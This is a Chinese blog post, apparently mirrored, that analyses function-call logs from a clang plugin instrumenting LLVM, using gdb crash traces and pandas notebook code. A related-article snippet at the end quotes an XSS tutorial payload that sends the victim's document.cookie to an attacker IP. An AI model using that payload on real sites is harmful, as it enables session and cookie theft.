clang插件对llvm源码插桩,分析函数调用日志(1)--google镜像

tick_plot__compile.ipynb

时长边界_时上链异数: 长短函数调用链列表

0. 用matplotlib找系统中字体文件大于1MB的

中文字体通常很大,这样过滤出的 通常有中文字体
结果中 看名字 ‘AR PL UMing CN’ 果然是中文字体

from matplotlib.font_manager import fontManager
import osfonts = [font.name for font in fontManager.ttflist if os.path.exists(font.fname) and os.stat(font.fname).st_size>1e6] for font in fonts:if 'CN' in font:print(font)
 AR PL UMing CN
AR PL UKai CN

!pip install scikit-learn

1. 产生tick日志

编译最小main加函数1语法错误 : 文件 mini_main_f1_err.c

//文件  mini_main_f1_err.c
char* calc_name(float age, bool high, char* nick){if(high && age>5){return "child";}char name[32]={"bigPeople"};return name;
}
int main(int argc, char** argv){calc_name(10,false,"nick");return 0;
}
tick_save=true  /pubx/build-llvm15/bin/clang-15 -c  mini_main_printf.c#corrupted double-linked list
#pure virtual method called
#terminate called without an active exception
#已放弃 (核心已转储)#生成tick日志文件:
#-rw-rw-r--  511M  8月 12 08:24 clang-15_13324_1691799886944_1#有输出目标文件
ls -lh  mini_main_printf.o 
#-rw-rw-r-- 1.4K  8月 12 08:29 mini_main_printf.o#但如果 试图输出可执行文件,则崩溃的更彻底:tick_save=true  /pubx/build-llvm15/bin/clang-15 mini_main_printf.c -o mmp"""
pure virtual method called
terminate called without an active exception
clang-15: error: unable to execute command: Aborted (core dumped)
clang-15: error: clang frontend command failed due to signal (use -v to see invocation)
clang version 15.0.0 (git@gitcode.net:pubz/llvm-project.git 3387b19bb538e694d2d965d46c7b053d61a059e3)
Target: x86_64-unknown-linux-gnu
Thread model: posix
InstalledDir: /pubx/build-llvm15/bin
clang-15: note: diagnostic msg: 
********************PLEASE ATTACH THE FOLLOWING FILES TO THE BUG REPORT:
Preprocessed source(s) and associated run script(s) are located at:
clang-15: note: diagnostic msg: /tmp/mini_main_printf-f6d921.c
clang-15: note: diagnostic msg: /tmp/mini_main_printf-f6d921.sh
clang-15: note: diagnostic msg: ********************
malloc(): unsorted double linked list corrupted
malloc(): unsorted double linked list corrupted
malloc(): unsorted double linked list corrupted
malloc(): unsorted double linked list corrupted
malloc(): unsorted double linked list corrupted
...
段错误 (核心已转储)
"""

崩溃初步分析

崩溃初步分析
gdb查看哪崩溃的,可以看到很奇怪,main已经完成后崩溃了,日志正常输出了,暂时不管了

gdb --args /pubx/build-llvm15/bin/clang-15 -c  mini_main_printf.c(gdb) set environment tick_save=true(gdb) run
Starting program: /build/pubx/build-llvm15/bin/clang-15 -c mini_main_printf.c
[Thread debugging using libthread_db enabled]Program received signal SIGSEGV, Segmentation fault.
0x00007ffff78a17c3 in unlink_chunk (p=p@entry=0x55555cbfc0b0, av=0x7ffff7a19c80 <main_arena>) at ./malloc/malloc.c:1634
1634    ./malloc/malloc.c: 没有那个文件或目录.(gdb) bt
#0  0x00007ffff78a17c3 in unlink_chunk (p=p@entry=0x55555cbfc0b0, av=0x7ffff7a19c80 <main_arena>) at ./malloc/malloc.c:1634
#1  0x00007ffff78a2939 in _int_free (av=0x7ffff7a19c80 <main_arena>, p=0x55555cbfc0b0, have_lock=<optimized out>) at ./malloc/malloc.c:4607
#2  0x00007ffff78a54d3 in __GI___libc_free (mem=<optimized out>) at ./malloc/malloc.c:3391
#3  0x00005555570ebb47 in llvm::PassRegistry::~PassRegistry() ()
#4  0x00007ffff7845495 in __run_exit_handlers (status=0, listp=0x7ffff7a19838 <__exit_funcs>, run_list_atexit=run_list_atexit@entry=true, run_dtors=run_dtors@entry=true)at ./stdlib/exit.c:113
#5  0x00007ffff7845610 in __GI_exit (status=<optimized out>) at ./stdlib/exit.c:143
#6  0x00007ffff7829d97 in __libc_start_call_main (main=main@entry=0x5555561c70e0 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffdc38) at ../sysdeps/nptl/libc_start_call_main.h:74
#7  0x00007ffff7829e40 in __libc_start_main_impl (main=0x5555561c70e0 <main>, argc=3, argv=0x7fffffffdc38, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdc28) at ../csu/libc-start.c:392
#8  0x00005555561aef05 in _start ()

1. 前置

# %config InlineBackend.figure_format = 'svg'
%config InlineBackend.rc={'figure.figsize': (30,20)}

sklearn 各种归一化

#sklearn 各种归一化
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MaxAbsScalerminMaxScaler = MinMaxScaler()
standardScaler = StandardScaler()
maxAbsScaler = MaxAbsScaler()# df['栈净'] = minMaxScaler.fit_transform(df[['栈净']])

导包

import numpy 
import math
import seaborn
import plotly.offline as plotly_offline
plotly_offline.init_notebook_mode(connected=True)          
import plotly.graph_objs as graph_objs                
import plotly.figure_factory as figure_factory from plotly.graph_objs import Scatter, Figure, Scatter3d

解决 matplotlib 中文不正常显示问题,中文显示为方块,原因是没有中文字体,这里 将字体设置为 上面找到的中文字体 ‘AR PL UMing CN’

import matplotlib.pyplot
matplotlib.pyplot.rcParams['font.family'] = 'AR PL UMing CN'
matplotlib.pyplot.rcParams['font.sans-serif'] = [ 'AR PL UMing CN']

pandas显示最大行数

import pandas
# pandas.options.display.max_columns = None
# pandas.options.display.max_rows = None

1b 作图前置

#增大图例颜色圆球的尺寸
def inrease_g_size(g):for lh in g.legend_.legendHandles: lh.set_alpha(1)lh._sizes = [500] 
import warnings
# 过滤掉RuntimeWarning警告
warnings.filterwarnings("ignore", category=RuntimeWarning)

2. 加载tick日志

%%bash
ls -lhrt /tick_data_home/ | tail -n 1
#-rw-rw-r-- 1 zz zz 511M  8月 14 18:11 clang-15_13324_1691799886944_1
#编译正常: mini_main.c
df=pandas.read_csv(filepath_or_buffer="/tick_data_home/clang-15_13324_1691799886944_1",sep=',' , quotechar="'")df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 3236685 entries, 0 to 3236684
Data columns (total 22 columns):#   Column             Dtype 
---  ------             ----- 0   滴答                 int64 1   funcLocalClock     int64 2   tickKind           int64 3   funcEnterId        int64 4   hasFuncCallChain   int64 5   funcEnterIdSeqLen  int64 6   funcEnterIdSeq     object7   rTSVarC            int64 8   d栈生                int64 9   d栈死                int64 10  d堆生                int64 11  d堆死                int64 12  栈生                 int64 13  栈死                 int64 14  栈净                 int64 15  堆生                 int64 16  堆死                 int64 17  堆净                 int64 18  srcFile            object19  funcLine           int64 20  funcCol            int64 21  funcName           object
dtypes: int64(19), object(3)
memory usage: 543.3+ MB

tickKind定义

文件: /pubx/clang-ctk/t_clock_tick/t_clock_tick.cpp
`cpp
/*滴答种类需要被正常分析的tick是 正常tick 和 函数返回tick,
正常分析不需要 函数进入tick看哪里少插入了X__funcReturn: 比对 函数进入tick    和  函数返回tick 是否配对
*/
enum TickKind{//正常tickNormalTick=0,//函数进入tick 可作为 和 函数返回tick 做比对,看哪里少插入了X__funcReturnFuncEnter=1,//函数返回tickFuncReturn=2};
NormalTick=0
#函数进入
FuncEnter=1
#函数返回tick
FuncReturn=2

这里不关注 一般tick,因此删除一般tick,可以大大提高本脚本运行速度

print(df.shape)df.drop( df[df['tickKind'] == NormalTick].index, inplace=True)print(df.shape)
(3236685, 22)
(666718, 22)

由于tick.cpp中 funcEnterIdSeq 构造很脏,需要清洗

funcEnterIdSeq 只有函数进入 才有正常字符串,其他(比如函数出、滴答)会出现NAN,因此要将NAN替换为空字符串

df['funcEnterIdSeq'].fillna('', inplace=True)

‘’ funcEnterIdSeq ‘’ 明显多了一对单引号,去掉多余的一对单引号
-2100558033#2#1# 左侧第一个负数,是因为拿了不是自己内存区域导致的,需要去掉。

df['funcEnterIdSeq']=df.funcEnterIdSeq.apply(lambda seqK:  seqK[seqK.find("#")+1:].replace("'","")  )

3. funcId 构造

df.head(1)

在这里插入图片描述

3.1 新增列 funcLoc 相当于字符串样式的funId

#新增列 funcLoc 
df['funcLoc']=df .apply(lambda r: f'{r.srcFile}_{r.funcLine}_{r.funcCol}', axis=1 )
df['funcLoc'].values[:4]
array(['/pubx/llvm-project/llvm/lib/Support/CommandLine.cpp_42_42','/pubx/llvm-project/llvm/lib/Support/CommandLine.cpp_41_41','/pubx/llvm-project/llvm/lib/Support/ManagedStatic.cpp_77_77','/pubx/llvm-project/llvm/lib/Support/Threading.cpp_36_36'],dtype=object)

3.2 以 区间[0, funcLoc不重复个数-1] 作为 funcId表

funcLoc_values=df['funcLoc'].values
type(funcLoc_values)#numpy.ndarray
len(funcLoc_values)#1014494funcLoc_list=list(funcLoc_values)
len(funcLoc_list)#1014494#funcLoc转为集合
funcLoc_set=set(funcLoc_values)
len(funcLoc_set)#2838#funcLoc集合作为列表: 即 不重复的funcLoc 列表
uqFuncLoc_Ls=list(funcLoc_set)
len(uqFuncLoc_Ls)#2838
#uq:unique#不重复的funcLoc 列表 转为 funcId表
funcId_Tab=dict( [(fL,j) for j,fL in enumerate(uqFuncLoc_Ls)] )
list(funcId_Tab.items())[:5]#上一版中, 此输出 源文件路径字段 左右都有粘连乱七八糟其他字符,明显是 由于使用了 已释放内存区域导致的
#这一版中,无此问题,源文件路径字段 左右很干净,说明 问题已经修复
 [('/pubx/llvm-project/llvm/lib/Support/MemoryBuffer.cpp_83_83', 0),('/pubx/llvm-project/clang/lib/Driver/Driver.cpp_58_58', 1),('/pubx/llvm-project/clang/lib/CodeGen/CodeGenTypes.cpp_69_69', 2),('/pubx/llvm-project/llvm/lib/MC/MCFragment.cpp_64_64', 3),('/pubx/llvm-project/llvm/lib/Support/VirtualFileSystem.cpp_57_57', 4)]
#按 funcId 查  funcLoc 表
funcId2Loc_Tab=dict( [(j,fL) for j,fL in enumerate(uqFuncLoc_Ls)] )
print("funcId个数:",len(funcId_Tab))
#funcId个数: 2738

3.3 参照 funLoc列、funcId表 新增列funcId

#新增列 funcId 
df['funcId']=df['funcLoc'] .apply(lambda fLocJ:  funcId_Tab[fLocJ] )
df['funcId'].values[:10]
df.head(2)
df.info()
<class 'pandas.core.frame.DataFrame'>
Int64Index: 666718 entries, 0 to 3236683
Data columns (total 24 columns):#   Column             Non-Null Count   Dtype 
---  ------             --------------   ----- 0   滴答                 666718 non-null  int64 1   funcLocalClock     666718 non-null  int64 2   tickKind           666718 non-null  int64 3   funcEnterId        666718 non-null  int64 4   hasFuncCallChain   666718 non-null  int64 5   funcEnterIdSeqLen  666718 non-null  int64 6   funcEnterIdSeq     666718 non-null  object7   rTSVarC            666718 non-null  int64 8   d栈生                666718 non-null  int64 9   d栈死                666718 non-null  int64 10  d堆生                666718 non-null  int64 11  d堆死                666718 non-null  int64 12  栈生                 666718 non-null  int64 13  栈死                 666718 non-null  int64 14  栈净                 666718 non-null  int64 15  堆生                 666718 non-null  int64 16  堆死                 666718 non-null  int64 17  堆净                 666718 non-null  int64 18  srcFile            666718 non-null  object19  funcLine           666718 non-null  int64 20  funcCol            666718 non-null  int64 21  funcName           666718 non-null  object22  funcLoc            666718 non-null  object23  funcId             666718 non-null  int64 
dtypes: int64(20), object(4)
memory usage: 127.2+ MB

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/139164.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

景联文科技助力金融机构强化身份验证,提供高质量人像采集服务

随着社会的数字化和智能化进程的加速&#xff0c;人像采集在金融机构身份认证领域中发挥重要作用&#xff0c;为人们的生活带来更多便利和安全保障。 金融机构在身份验证上的痛点主要包括以下方面&#xff1a; 身份盗用和欺诈风险&#xff1a;传统身份验证方式可能存在漏洞&am…

【已解决】ModuleNotFoundError: No module named ‘sklearn‘

问题描述 Traceback (most recent call last): File "/home/visionx/nickle/temp/SimCLR/linear_evaluation.py", line 210, in <module> from sklearn.manifold import TSNE ModuleNotFoundError: No module named sklearn 解决办法 pip install numpy…

体验前所未有的显示器管理体验:BetterDisplay Pro Mac

在现代的数字化时代&#xff0c;显示器是我们日常生活和工作中不可或缺的一部分。从笔记本电脑到台式机&#xff0c;从平板电脑到手机&#xff0c;几乎所有的电子设备都配备了显示器。然而&#xff0c;对于专业人士和从事设计行业的人来说&#xff0c;仅仅依靠系统自带的显示器…

基于SpringBoot+Vue+mysql卓越导师双选系统设计与实现

博主介绍&#xff1a;✌Csdn特邀作者、博客专家、博客云专家、B站程序阿龙带小白做毕设系列&#xff0c;项目讲解、B站粉丝排行榜前列、专注于Java技术领域和毕业项目实战✌ 系统说明简介&#xff1a; 如今的信息时代&#xff0c;对信息的共享性&#xff0c;信息的流通性有着较…

自适应AI chatGPT智能聊天创作官网html源码/最新AI创作系统/ChatGPT商业版网站源码

源码简介&#xff1a; 自适应AI chatGPT智能聊天创作官网html源码&#xff0c;这是最新AI创作系统&#xff0c;作为ChatGPT商业版网站源码&#xff0c;它是支持创作、编写、翻译、写代码等。是一个智能聊天系统项目源码。 注意&#xff1a;这个只是网站html源码&#xff0c;要…

SpringCloud——消息总线——Bus

1.什么是总线&#xff1f; 我们在微服务的项目中&#xff0c;通常会构建一个共同的消息主题&#xff0c;然后需要的服务可以连接上来&#xff0c;该主题中产生的消息会被监听和消费&#xff0c;这种我们称为消息总线。 SpringCloud Bus 配合SpringCloud Config使用可以实现配置…

xss 盲打

XSS 盲打 为什么教盲打&#xff0c;是因为处于被动&#xff0c;要等待受害者触发 1.利用存储型XSS 先将代码写入留言。同时kali开启端口监听&#xff08;下面IP是kali的&#xff09; <script>document.write(\<img src\"http://10.9.47.79/\document.cookie\\&qu…

Jenkins 部署.net core 项目 - NU1301错误

/root/.jenkins/workspace/householdess/services/host/fdbatt.monitor.HttpApi.Host/fdbatt.monitor.HttpApi.Host.csproj : error NU1301: 本地源“/root/.jenkins/workspace/householdess/​http:/x.x.x.x:9081/repository/nuget.org-proxy/index.json”不存在。 [/root/.je…

汽车制动系统技术分析概要

目录 1.基本功能概述 2. 基本工作原理分析 2.1 Two-Box系统架构(Bosch_IBooster) 2.2 One-Box系统架构(Bosch_IPB) 2.3 ​​​​​​​ABS技术 2.4 TCS技术 2.5 VDC技术 2.6 EPB技术 2.7 小结 3. 该场景应用发展趋势分析 1.基本功能概述 传统汽车的底盘主要由传动系、…

最全面的软考架构师复习资料(历时2年整理)

一、面向服务的架构 1.请分别用200字以内文字说明什么是面向服务架构&#xff08;SOA&#xff09;以及ESB在SOA的作用与特点 面向服务的体系架构&#xff08;SOA&#xff09;是一种粗粒度、松耦合的服务架构&#xff0c;服务之间通过简单、精确定义接口进行通信。他可以根据需求…

CSS3 多媒体查询、网格布局

一、CSS3多媒体查询&#xff1a; CSS3 多媒体查询继承了CSS2多媒体类型的所有思想&#xff0c;取代了查找设备的类型。CSS3根据设置自适应显示。 多媒体查询语法&#xff1a; media not|only mediatype and (expressions) { CSS 代码...; } not: not是用来排除掉某些特定…

论文笔记:SimiDTR: Deep Trajectory Recovery with Enhanced Trajectory Similarity

DASFFA 2023 1 intro 1.1 背景 由于设备和环境的限制&#xff08;设备故障&#xff0c;信号缺失&#xff09;&#xff0c;许多轨迹以低采样率记录&#xff0c;或者存在缺失的位置&#xff0c;称为不完整轨迹 恢复不完整轨迹的缺失空间-时间点并降低它们的不确定性是非常重要…

RT-Thread构建与配置系统

简述 RT-Thread的构建与配置系统由以下几个部分组成&#xff1a; KConfig&#xff1a;kernel config配置文件&#xff08;提供系统的配置裁剪功能&#xff09;SCons&#xff1a;构建工具env工具&#xff1a;主要提供构建系统所需的各种环境变量以及软件包的管理 Kconfig在R…

【C++】this指针讲解超详细!!!

&#x1f490; &#x1f338; &#x1f337; &#x1f340; &#x1f339; &#x1f33b; &#x1f33a; &#x1f341; &#x1f343; &#x1f342; &#x1f33f; &#x1f344;&#x1f35d; &#x1f35b; &#x1f364; &#x1f4c3;个人主页 &#xff1a;阿然成长日记 …

ElasticSearch的集群、节点、索引、分片和副本

Elasticsearch是面向文档型数据库&#xff0c;一条数据在这里就是一个文档。为了方便大家理解&#xff0c;我们将Elasticsearch里存储文档数据和关系型数据库MySQL存储数据的概念进行一个类比 ES里的Index可以看做一个库&#xff0c;而Types相当于表&#xff0c;Documents则相当…

宠物社区系统宠物领养小程序,宠物救助小程序系统多少钱?

当前很多的宠物被抛弃和虐杀&#xff0c;它们没有选择权&#xff0c;我们强制性的把狗带进人类的生活中&#xff0c;然后又无情的抛弃&#xff0c;让它们无家可归&#xff0c;变成流浪狗&#xff0c;它们做错了什么&#xff1f;流浪动物被主人遗弃之后居无定所&#xff0c;时刻…

海康工业相机如何提高相机帧率

影响帧率的因素 相机参数 帧率限制使能 像素格式 曝光时间 数据包大小&#xff08;网口&#xff09; 相机默认参数 ADC位深 系统环境设置

相机内外参实践之点云投影矢量图

目录 概述 涉及到的坐标变换 深度值可视化 3D点云的2D投影实现 实现效果 参考文献 概述 Camer的内外参在多模态融合中主要涉及到坐标系变换&#xff0c;即像素坐标、相机坐标以及其他坐标系。这篇就针对点云到图像的投影与反投影做代码实践&#xff0c;来构建一张具有深度…

阿里云-maven私服idea访问私服与组件上传

1.进入aliyun制品仓库 2. 点击 生产库-release进入 根据以上步骤修改本地 m2/setting.xml文件 3.pom.xml文件 点击设置获取url 4. idea发布组件